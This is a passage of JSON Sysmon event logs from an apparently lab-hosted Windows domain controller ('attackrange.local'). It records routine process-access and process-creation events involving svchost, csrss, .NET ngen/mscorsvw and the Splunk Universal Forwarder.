C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00106AB00F00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.897\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.897","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.897\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.897","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.897\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nTargetProcessId: 2912\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.897","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00105FB50F00}","TargetProcessId":"2912","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.038\r\nProcessGuid: {41C8662E-2294-5F25-0000-00100FB90F00}\r\nProcessId: 4168\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.038","ProcessGuid":"{41C8662E-2294-5F25-0000-00100FB90F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010DA5D0F00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010DA5D0F00}","TargetProcessId":"4168","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7989,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010DA5D0F00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010DA5D0F00}","TargetProcessId":"4168","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7990,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7991,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
